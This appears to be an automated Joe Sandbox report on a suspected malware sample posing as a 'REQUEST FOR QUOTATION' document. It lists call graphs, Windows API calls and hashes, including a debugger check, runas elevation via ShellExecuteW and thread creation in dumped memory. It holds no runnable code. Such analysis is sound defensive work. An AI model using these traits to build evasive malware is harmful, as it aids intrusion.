calls 111044->111041 111047 404e4a 84 API calls 111045->111047 111049 43d1a8 111047->111049 111053 403ed0 59 API calls 111049->111053 111050 407de1 59 API calls 111051 403808 111050->111051 111052 4084c0 69 API calls 111051->111052 111054 40381a Mailbox 111052->111054 111055 43d1c3 111053->111055 111056 407de1 59 API calls 111054->111056 111057 403ed0 59 API calls 111055->111057 111058 403840 111056->111058 111059 43d1df 111057->111059 111060 4084c0 69 API calls 111058->111060 111061 404706 61 API calls 111059->111061 111063 40384f Mailbox 111060->111063 111062 43d204 111061->111062 111064 403ed0 59 API calls 111062->111064 111066 407667 59 API calls 111063->111066 111065 43d210 111064->111065 111067 408047 59 API calls 111065->111067 111068 40386d 111066->111068 111069 43d21e 111067->111069 111173 403ed0 111068->111173 111071 403ed0 59 API calls 111069->111071 111073 43d22d 111071->111073 111079 408047 59 API calls 111073->111079 111075 403887 111075->111049 111076 403891 111075->111076 111077 422efd _W_store_winword 60 API calls 111076->111077 111078 40389c 111077->111078 111078->111055 111081 43d24f 111079->111081 111157 403d3e __write_nolock 111156->111157 111158 407bcc 59 API calls 111157->111158 111163 403ea4 Mailbox 111157->111163 111160 403d70 111158->111160 111159 4079f2 59 API calls 111159->111160 111160->111159 111166 403da6 Mailbox 111160->111166 111161 403e77 111162 407de1 59 API calls 111161->111162 111161->111163 111165 403e98 111162->111165 111163->111029 111164 407de1 59 API calls 111164->111166 111167 403f74 59 API calls 111165->111167 111166->111161 111166->111163 111166->111164 111169 4079f2 59 API calls 111166->111169 111233 403f74 111166->111233 111167->111163 111169->111166 111171 420db6 Mailbox 59 API calls 111170->111171 111172 4037fb 111171->111172 111172->111050 111174 403ef3 111173->111174 111175 403eda 111173->111175 111176 407bcc 59 API calls 111174->111176 111177 408047 59 API calls 111175->111177 111178 403879 111176->111178 111177->111178 111179 422efd 111178->111179 111180 422f09 111179->111180 111181 422f7e 111179->111181 111188 422f2e 111180->111188 111239 428b28 58 API calls __getptd_noexit 111180->111239 111241 422f90 60 API calls 3 library calls 111181->111241 111184 422f8b 111184->111075 111185 422f15 111240 428db6 9 API calls __wfsopen 111185->111240 111187 422f20 111187->111075 111188->111075 111199 404ee5 85 API calls 111198->111199 111200 4695ca 111199->111200 111201 469734 96 API calls 111200->111201 111202 4695dc 111201->111202 111203 404f0b 74 API calls 111202->111203 111229 43d186 111202->111229 111204 4695f7 111203->111204 111205 404f0b 74 API calls 111204->111205 111206 469607 111205->111206 111207 404f0b 74 API calls 111206->111207 111208 469622 111207->111208 111209 404f0b 74 API calls 111208->111209 111210 46963d 111209->111210 111211 404ee5 85 API calls 111210->111211 111212 469654 111211->111212 111213 42571c __malloc_crt 58 API calls 111212->111213 111214 46965b 111213->111214 111215 42571c __malloc_crt 58 API calls 111214->111215 111216 469665 111215->111216 111217 404f0b 74 API calls 111216->111217 111218 469679 111217->111218 111219 469109 GetSystemTimeAsFileTime 111218->111219 111220 46968c 111219->111220 111221 4696b6 111220->111221 111222 4696a1 111220->111222 111224 4696bc 111221->111224 111225 46971b 111221->111225 111223 422d55 _free 58 API calls 111222->111223 111227 4696a7 111223->111227 111229->111041 111229->111044 111234 403f82 111233->111234 111238 403fa4 _memmove 111233->111238 111237 420db6 Mailbox 59 API calls 111234->111237 111235 420db6 Mailbox 59 API calls 111236 403fb8 111235->111236 111236->111166 111237->111238 111238->111235 111239->111185 111240->111187 111241->111184 111530 401055 111535 402649 111530->111535 111533 422d40 __cinit 67 API calls 111534 401064 111533->111534 111536 407667 59 API calls 111535->111536 111537 4026b7 111536->111537 111542 403582 111537->111542 111539 402754 111541 40105a 111539->111541 111545 403416 59 API calls 2 library calls 111539->111545 111541->111533 111546 4035b0 111542->111546 111545->111539 111547 4035bd 111546->111547 111548 4035a1 111546->111548 111547->111548 111549 4035c4 RegOpenKeyExW 111547->111549 111548->111539 111549->111548 111550 4035de RegQueryValueExW 111549->111550 111551 403614 RegCloseKey 111550->111551 111552 4035ff 111550->111552 111551->111548 111552->111551 111553 ae5a3b 111554 ae5a45 111553->111554 111559 ae4f7c 111553->111559 111555 ae51ae 111554->111555 111556 ae5a4b CreateThread 111554->111556 111557 ae5a59 RtlExitUserThread 111556->111557 111563 ae5b1d 111557->111563 111558 ae4f88 111559->111558 111561 ae5d20 2 API calls 111559->111561 111562 ae4f99 111561->111562 111564 ae5d20 2 API calls 111563->111564 111565 ae5b3c 111564->111565 111566 401016 111571 404974 111566->111571 111569 422d40 __cinit 67 API calls 111570 401025 111569->111570 111572 420db6 Mailbox 59 API calls 111571->111572 111573 40497c 111572->111573 111574 40101b 111573->111574 111578 404936 111573->111578 111574->111569 111579 40493f 111578->111579 111581 404951 111578->111581 111580 422d40 __cinit 67 API calls 111579->111580 111580->111581 111582 4049a0 111581->111582 111583 407667 59 API calls 111582->111583 111584 4049b8 GetVersionExW 111583->111584 111585 407bcc 59 API calls 111584->111585 111586 4049fb 111585->111586 111587 407d2c 59 API calls 111586->111587 111596 404a28 111586->111596 111588 404a1c 111587->111588 111589 407726 59 API calls 111588->111589 111589->111596 111590 404a93 GetCurrentProcess IsWow64Process 111591 404aac 111590->111591 111593 404ac2 111591->111593 111594 404b2b GetSystemInfo 111591->111594 111592 43d864 111606 404b37 111593->111606 111595 404af8 111594->111595 111595->111574 111596->111590 111596->111592 111599 404ad4 111602 404b37 2 API calls 111599->111602 111600 404b1f GetSystemInfo 111601 404ae9 111600->111601 111601->111595 111604 404aef FreeLibrary 111601->111604 111603 404adc GetNativeSystemInfo 111602->111603 111603->111601 111604->111595 111607 404ad0 111606->111607 111608 404b40 LoadLibraryA 111606->111608 111607->111599 111607->111600 111608->111607 111609 404b51 GetProcAddress 111608->111609 111609->111607 111610 401078 111615 40708b 111610->111615 111612 40108c 111613 422d40 __cinit 67 API calls 111612->111613 111614 401096 111613->111614 111616 40709b __write_nolock 111615->111616 111617 407667 59 API calls 111616->111617 111618 407151 111617->111618 111619 404706 61 API calls 111618->111619 111620 40715a 111619->111620 111646 42050b 111620->111646 111623 407cab 59 API calls 111624 407173 111623->111624 111625 403f74 59 API calls 111624->111625 111626 407182 111625->111626 111627 407667 59 API calls 111626->111627 111628 40718b 111627->111628 111629 407d8c 59 API calls 111628->111629 111630 407194 RegOpenKeyExW 111629->111630 111631 43e8b1 RegQueryValueExW 111630->111631 111635 4071b6 Mailbox 111630->111635 111632 43e943 RegCloseKey 111631->111632 111633 43e8ce 111631->111633 111632->111635 111645 43e955 _wcscat Mailbox __wsetenvp 111632->111645 111634 420db6 Mailbox 59 API calls 111633->111634 111636 43e8e7 111634->111636 111635->111612 111638 40522e 59 API calls 111636->111638 111637 4079f2 59 API calls 111637->111645 111639 43e8f2 RegQueryValueExW 111638->111639 111640 43e90f 111639->111640 111642 43e929 111639->111642 111641 407bcc 59 API calls 111640->111641 111641->111642 111642->111632 111643 407de1 59 API calls 111643->111645 111644 403f74 59 API calls 111644->111645 111645->111635 111645->111637 111645->111643 111645->111644 111647 431940 __write_nolock 111646->111647 111648 420518 GetFullPathNameW 111647->111648 111649 42053a 111648->111649 111650 407bcc 59 API calls 111649->111650 111651 407165 111650->111651 111651->111623 111652 aeaaf0 111653 aeab06 111652->111653 111657 aeab57 111653->111657 111658 ae6490 111653->111658 111655 aeab20 111662 b1faf0 111655->111662 111660 ae5f10 111658->111660 111661 ae5d90 111658->111661 111659 ae6084 SetFilePointerEx 111659->111660 111660->111659 111660->111661 111661->111655 111661->111661 111663 b1fafd 111662->111663 111664 b1fb84 111662->111664 111663->111664 111665 b1fb2a 111663->111665 111669 b1fc05 111664->111669 111673 b1fbda 111664->111673 111668 b2032f 111665->111668 111681 b21a1b 21 API calls 2 library calls 111665->111681 111667 b208d6 111667->111657 111668->111657 111672 b1fc38 111669->111672 111680 b20fe0 21 API calls __startOneArgErrorHandling 111669->111680 111671 b1fc22 111671->111657 111672->111657 111673->111672 111674 b21167 111673->111674 111675 b2116e 111673->111675 111682 b20ff7 21 API calls __startOneArgErrorHandling 111674->111682 111683 b20fe0 21 API calls __startOneArgErrorHandling 111675->111683 111678 b2116c 111678->111657 111679 b21173 111679->111657 111680->111671 111681->111667 111682->111678 111683->111679 111684 43fdfc 111688 40ab30 Mailbox _memmove 111684->111688 111686 45617e Mailbox 59 API calls 111698 40a057 111686->111698 111689 420db6 59 API calls Mailbox 111688->111689 111690 40b525 111688->111690 111696 409f37 Mailbox 111688->111696 111688->111698 111712 407de1 59 API calls 111688->111712 111716 47bc6b 341 API calls 111688->111716 111718 40b2b6 111688->111718 111719 409ea0 341 API calls 111688->111719 111721 44086a 111688->111721 111723 440878 111688->111723 111725 44085c 111688->111725 111726 40b21c 111688->111726 111730 456e8f 59 API calls 111688->111730 111735 47445a 341 API calls 111688->111735 111737 411fc3 111688->111737 111777 46d07a 111688->111777 111824 47e4d1 111688->111824 111830 47df23 111688->111830 111833 46d07b 111688->111833 111880 47c2e0 111688->111880 111912 467956 111688->111912 111918 45617e 111688->111918 111923 409c90 59 API calls Mailbox 111688->111923 111927 47c193 85 API calls 2 library calls 111688->111927 111689->111688 111929 469e4a 89 API calls 4 library calls 111690->111929 111693 420db6 59 API calls Mailbox 111693->111696 111694 4409e5 111934 469e4a 89 API calls 4 library calls 111694->111934 111695 440055 111928 469e4a 89 API calls 4 library calls 111695->111928 111696->111693 111696->111695 111696->111698 111699 40b47a 111696->111699 111701 40b475 111696->111701 111707 408047 59 API calls 111696->111707 111709 407667 59 API calls 111696->111709 111710 456e8f 59 API calls 111696->111710 111711 422d40 67 API calls __cinit 111696->111711 111713 4409d6 111696->111713 111715 40a55a 111696->111715 111921 40c8c0 341 API calls 2 library calls 111696->111921 111922 40b900 60 API calls Mailbox 111696->111922 111699->111694 111699->111695 111706 408047 59 API calls 111701->111706 111703 440064 111706->111698 111707->111696 111709->111696 111710->111696 111711->111696 111712->111688 111933 469e4a 89 API calls 4 library calls 111713->111933 111932 469e4a 89 API calls 4 library calls 111715->111932 111716->111688 111926 40f6a3 341 API calls 111718->111926 111719->111688 111930 409c90 59 API calls Mailbox 111721->111930 111931 469e4a 89 API calls 4 library calls 111723->111931 111725->111686 111725->111698 111924 409d3c 60 API calls Mailbox 111726->111924 111728 40b22d 111925 409d3c 60 API calls Mailbox 111728->111925 111730->111688 111735->111688 111738 409a98 59 API calls 111737->111738 111739 411fdb 111738->111739 111741 420db6 Mailbox 59 API calls 111739->111741 111743 446585 111739->111743 111742 411ff4 111741->111742 111745 412004 111742->111745 111956 4057a6 60 API calls Mailbox 111742->111956 111744 412029 111743->111744 111959 46f574 59 API calls 111743->111959 111753 412036 111744->111753 111960 409b3c 59 API calls 111744->111960 111747 409837 84 API calls 111745->111747 111749 412012 111747->111749 111751 4057f6 67 API calls 111749->111751 111750 4465cd 111752 4465d5 111750->111752 111750->111753 111754 412021 111751->111754 111961 409b3c 59 API calls 111752->111961 111755 405cdf 2 API calls 111753->111755 111754->111743 111754->111744 111958 4058ba CloseHandle 111754->111958 111758 41203d 111755->111758 111759 4465e7 111758->111759 111760 412057 111758->111760 111762 420db6 Mailbox 59 API calls 111759->111762 111761 407667 59 API calls 111760->111761 111763 41205f 111761->111763 111764 4465ed 111762->111764 111935 405572 111763->111935 111766 446601 111764->111766 111962 405850 ReadFile SetFilePointerEx 111764->111962 111770 446605 _memmove 111766->111770 111963 4676c4 59 API calls 2 library calls 111766->111963 111769 41206e 111769->111770 111950 409a3c 111769->111950 111772 412082 Mailbox 111773 4120bc 111772->111773 111774 405c6f CloseHandle 111772->111774 111773->111688 111775 4120b0 111774->111775 111775->111773 111957 4058ba CloseHandle 111775->111957 111778 46d09a 111777->111778 111779 46d0a5 111777->111779 111967 409b3c 59 API calls 111778->111967 111782 407667 59 API calls 111779->111782 111812 46d17f Mailbox 111779->111812 111781 420db6 Mailbox 59 API calls 111783 46d1c8 111781->111783 111785 46d0c9 111782->111785 111784 46d1d4 111783->111784 111970 4057a6 60 API calls Mailbox 111783->111970 111789 409837 84 API calls 111784->111789 111786 407667 59 API calls 111785->111786 111788 46d0d2 111786->111788 111790 409837 84 API calls 111788->111790 111791 46d1ec 111789->111791 111792 46d0de 111790->111792 111793 4057f6 67 API calls 111791->111793 111794 40459b 59 API calls 111792->111794 111795 46d1fb 111793->111795 111796 46d0f3 111794->111796 111797 46d233 111795->111797 111798 46d1ff GetLastError 111795->111798 111799 407b2e 59 API calls 111796->111799 111801 46d295 111797->111801 111802 46d25e 111797->111802 111800 46d218 111798->111800 111803 46d126 111799->111803 111821 46d188 Mailbox 111800->111821 111971 4058ba CloseHandle 111800->111971 111804 420db6 Mailbox 59 API calls 111801->111804 111805 420db6 Mailbox 59 API calls 111802->111805 111806 46d178 111803->111806 111810 463c37 3 API calls 111803->111810 111807 46d29a 111804->111807 111809 46d263 111805->111809 111969 409b3c 59 API calls 111806->111969 111815 407667 59 API calls 111807->111815 111807->111821 111813 46d274 111809->111813 111816 407667 59 API calls 111809->111816 111814 46d136 111810->111814 111812->111781 111812->111821 111972 47fbce 59 API calls 2 library calls 111813->111972 111814->111806 111817 46d13a 111814->111817 111815->111821 111816->111813 111818 407de1 59 API calls 111817->111818 111820 46d147 111818->111820 111968 463a2a 63 API calls Mailbox 111820->111968 111821->111688 111823 46d150 Mailbox 111823->111806 111828 47e4e4 111824->111828 111825 409837 84 API calls 111826 47e521 111825->111826 111973 467729 111826->111973 111828->111825 111829 47e4f3 111828->111829 111829->111688 111831 47cadd 130 API calls 111830->111831 111832 47df33 111831->111832 111832->111688 111834 46d09a 111833->111834 111835 46d0a5 111833->111835 112014 409b3c 59 API calls 111834->112014 111837 46d17f Mailbox 111835->111837 111839 407667 59 API calls 111835->111839 111838 420db6 Mailbox 59 API calls 111837->111838 111877 46d188 Mailbox 111837->111877 111840 46d1c8 111838->111840 111842 46d0c9 111839->111842 111841 46d1d4 111840->111841 112017 4057a6 60 API calls Mailbox 111840->112017 111846 409837 84 API calls 111841->111846 111843 407667 59 API calls 111842->111843 111845 46d0d2 111843->111845 111847 409837 84 API calls 111845->111847 111848 46d1ec 111846->111848 111849 46d0de 111847->111849 111850 4057f6 67 API calls 111848->111850 111851 40459b 59 API calls 111849->111851 111852 46d1fb 111850->111852 111853 46d0f3 111851->111853 111854 46d233 111852->111854 111855 46d1ff GetLastError 111852->111855 111856 407b2e 59 API calls 111853->111856 111858 46d295 111854->111858 111859 46d25e 111854->111859 111857 46d218 111855->111857 111860 46d126 111856->111860 111857->111877 112018 4058ba CloseHandle 111857->112018 111861 420db6 Mailbox 59 API calls 111858->111861 111862 420db6 Mailbox 59 API calls 111859->111862 111863 46d178 111860->111863 111867 463c37 3 API calls 111860->111867 111864 46d29a 111861->111864 111866 46d263 111862->111866 112016 409b3c 59 API calls 111863->112016 111871 407667 59 API calls 111864->111871 111864->111877 111869 46d274 111866->111869 111872 407667 59 API calls 111866->111872 111870 46d136 111867->111870 112019 47fbce 59 API calls 2 library calls 111869->112019 111870->111863 111873 46d13a 111870->111873 111871->111877 111872->111869 111874 407de1 59 API calls 111873->111874 111876 46d147 111874->111876 112015 463a2a 63 API calls Mailbox 111876->112015 111877->111688 111879 46d150 Mailbox 111879->111863 111881 407667 59 API calls 111880->111881 111882 47c2f4 111881->111882 111883 407667 59 API calls 111882->111883 111884 47c2fc 111883->111884 111885 407667 59 API calls 111884->111885 111886 47c304 111885->111886 111887 409837 84 API calls 111886->111887 111890 47c312 111887->111890 111888 407bcc 59 API calls 111888->111890 111889 407924 59 API calls 111889->111890 111890->111888 111890->111889 111891 47c528 Mailbox 111890->111891 111893 47c4e2 111890->111893 111895 47c4fd 111890->111895 111898 408047 59 API calls 111890->111898 111899 407e4f 59 API calls 111890->111899 111902 407e4f 59 API calls 111890->111902 111904 47c4fb 111890->111904 111909 409837 84 API calls 111890->111909 111910 407b2e 59 API calls 111890->111910 111911 407cab 59 API calls 111890->111911 111891->111688 111892 409a3c 59 API calls 111892->111891 111894 407cab 59 API calls 111893->111894 111896 47c4ef 111894->111896 111897 407cab 59 API calls 111895->111897 111900 407b2e 59 API calls 111896->111900 111901 47c50c 111897->111901 111898->111890 111903 47c3a9 CharUpperBuffW 111899->111903 111900->111904 111905 407b2e 59 API calls 111901->111905 111906 47c469 CharUpperBuffW 111902->111906 112020 40843a 68 API calls 111903->112020 111904->111891 111904->111892 111905->111904 112021 40c5a7 69 API calls 2 library calls 111906->112021 111909->111890 111910->111890 111911->111890 111913 467962 111912->111913 111914 420db6 Mailbox 59 API calls 111913->111914 111915 467970 111914->111915 111916 46797e 111915->111916 111917 407667 59 API calls 111915->111917 111916->111688 111917->111916 112022 4560c0 111918->112022 111920 45618c 111920->111688 111921->111696 111922->111696 111923->111688 111924->111728 111925->111718 111926->111690 111927->111688 111928->111703 111929->111725 111930->111725 111931->111725 111932->111698 111933->111694 111934->111698 111936 4055a2 111935->111936 111937 40557d 111935->111937 111938 407d8c 59 API calls 111936->111938 111937->111936 111941 40558c 111937->111941 111942 46325e 111938->111942 111939 46328d 111939->111769 111943 405ab8 59 API calls 111941->111943 111942->111939 111964 4631fa ReadFile SetFilePointerEx 111942->111964 111965 407924 59 API calls 2 library calls 111942->111965 111944 46337e 111943->111944 111946 4054d2 61 API calls 111944->111946 111947 46338c 111946->111947 111949 46339c Mailbox 111947->111949 111966 4077da 61 API calls Mailbox 111947->111966 111949->111769 111951 409a87 111950->111951 111953 409a48 111950->111953 111952 408047 59 API calls 111951->111952 111955 409a5b 111952->111955 111954 420db6 Mailbox 59 API calls 111953->111954 111954->111955 111955->111772 111956->111745 111957->111773 111958->111743 111959->111743 111960->111750 111961->111758 111962->111766 111963->111770 111964->111942 111965->111942 111966->111949 111967->111779 111968->111823 111969->111812 111970->111784 111971->111821 111972->111821 111974 467736 111973->111974 111975 420db6 Mailbox 59 API calls 111974->111975 111976 46773d 111975->111976 111979 465b7a 111976->111979 111978 467780 Mailbox 111978->111829 111980 407e4f 59 API calls 111979->111980 111981 465b8d CharLowerBuffW 111980->111981 111983 465ba0 111981->111983 111982 4079f2 59 API calls 111982->111983 111983->111982 111984 465bda 111983->111984 111996 465baa _memset Mailbox 111983->111996 111985 465bec 111984->111985 111986 4079f2 59 API calls 111984->111986 111987 420db6 Mailbox 59 API calls 111985->111987 111986->111985 111990 465c1a 111987->111990 111992 465c39 111990->111992 112012 465ab6 59 API calls 111990->112012 111991 465c78 111993 420db6 Mailbox 59 API calls 111991->111993 111991->111996 111997 465cd7 111992->111997 111994 465c92 111993->111994 111995 420db6 Mailbox 59 API calls 111994->111995 111995->111996 111996->111978 111998 407667 59 API calls 111997->111998 111999 465d09 111998->111999 112000 407667 59 API calls 111999->112000 112001 465d12 112000->112001 112002 407667 59 API calls 112001->112002 112007 465d1b _wcscmp 112002->112007 112003 407bcc 59 API calls 112003->112007 112004 465ff0 Mailbox 112004->111991 112005 407924 59 API calls 112005->112007 112006 423606 GetStringTypeW 112006->112007 112007->112003 112007->112004 112007->112005 112007->112006 112009 42358a 59 API calls 112007->112009 112010 465cd7 60 API calls 112007->112010 112011 408047 59 API calls 112007->112011 112013 42362c GetStringTypeW _iswctype 112007->112013 112009->112007 112010->112007 112011->112007 112012->111990 112013->112007 112014->111835 112015->111879 112016->111837 112017->111841 112018->111877 112019->111877 112020->111890 112021->111890 112023 4560e8 112022->112023 112024 4560cb 112022->112024 112023->111920 112024->112023 112026 4560ab 59 API calls Mailbox 112024->112026 112026->112024
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: d$w
                                                                                                                                                                                                                              • API String ID: 0-2400632791
                                                                                                                                                                                                                              • Opcode ID: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                                                                                                                                                                                                                              • Instruction ID: 5704ff38ac9576bfa65f8f0110b6c50fc733488f3e6868b24dffeff4dafdee91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1944575e2515ea1b5c851f33bcb90a0d5ea871e09128080f7c978f384ed2bbe1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAC13135A0C340AFDA354B248C5AF7A3EE0EB61B20F5C47D6F656AA0F3E7259C05D612

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                                • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                                                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                                                                                                                                                                • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                                                                                                • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                                                                                                • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                                                                                                • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                                                                                                • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                                                                                                                                                                • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                                                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                                                                                                                                                              • API String ID: 529118366-2806069697
                                                                                                                                                                                                                              • Opcode ID: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                                                                                                                                                                                                                              • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4236761a2e01d09a43ad1a7d36c76404b2c9892055a2db99edd68306d0b0981c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2085 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2090 404a06 2085->2090 2091 404b0b-404b0d 2085->2091 2092 404a09-404a0e 2090->2092 2093 43d767-43d773 2091->2093 2095 404b12-404b13 2092->2095 2096 404a14 2092->2096 2094 43d774-43d778 2093->2094 2097 43d77b-43d787 2094->2097 2098 43d77a 2094->2098 2099 404a15-404a4c call 407d2c call 407726 2095->2099 2096->2099 2097->2094 2100 43d789-43d78e 2097->2100 2098->2097 2108 404a52-404a53 2099->2108 2109 43d864-43d867 2099->2109 2100->2092 2102 43d794-43d79b 2100->2102 2102->2093 2104 43d79d 2102->2104 2107 43d7a2-43d7a5 2104->2107 2110 404a93-404aaa GetCurrentProcess IsWow64Process 2107->2110 2111 43d7ab-43d7c9 2107->2111 2108->2107 2112 404a59-404a64 2108->2112 2113 43d880-43d884 2109->2113 2114 43d869 2109->2114 2115 404aac 2110->2115 2116 404aaf-404ac0 2110->2116 2111->2110 2117 43d7cf-43d7d5 2111->2117 2118 43d7ea-43d7f0 2112->2118 2119 404a6a-404a6c 2112->2119 2121 43d886-43d88f 2113->2121 2122 43d86f-43d878 2113->2122 2120 43d86c 2114->2120 2115->2116 2124 404ac2-404ad2 call 404b37 2116->2124 2125 404b2b-404b35 GetSystemInfo 2116->2125 2126 43d7d7-43d7da 2117->2126 2127 43d7df-43d7e5 2117->2127 2130 43d7f2-43d7f5 2118->2130 2131 43d7fa-43d800 2118->2131 2128 404a72-404a75 2119->2128 2129 43d805-43d811 2119->2129 2120->2122 2121->2120 2123 43d891-43d894 2121->2123 2122->2113 2123->2122 2142 404ad4-404ae1 call 404b37 2124->2142 2143 404b1f-404b29 GetSystemInfo 2124->2143 2132 404af8-404b08 2125->2132 2126->2110 2127->2110 2136 43d831-43d834 2128->2136 2137 404a7b-404a8a 2128->2137 2133 43d813-43d816 2129->2133 2134 43d81b-43d821 2129->2134 2130->2110 2131->2110 2133->2110 2134->2110 2136->2110 2139 43d83a-43d84f 2136->2139 2140 404a90 2137->2140 2141 43d826-43d82c 2137->2141 2144 43d851-43d854 2139->2144 2145 43d859-43d85f 2139->2145 2140->2110 2141->2110 2150 404ae3-404ae7 GetNativeSystemInfo 2142->2150 2151 404b18-404b1d 2142->2151 2146 404ae9-404aed 2143->2146 2144->2110 2145->2110 2146->2132 2149 404aef-404af2 FreeLibrary 2146->2149 2149->2132 2150->2146 2151->2150
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
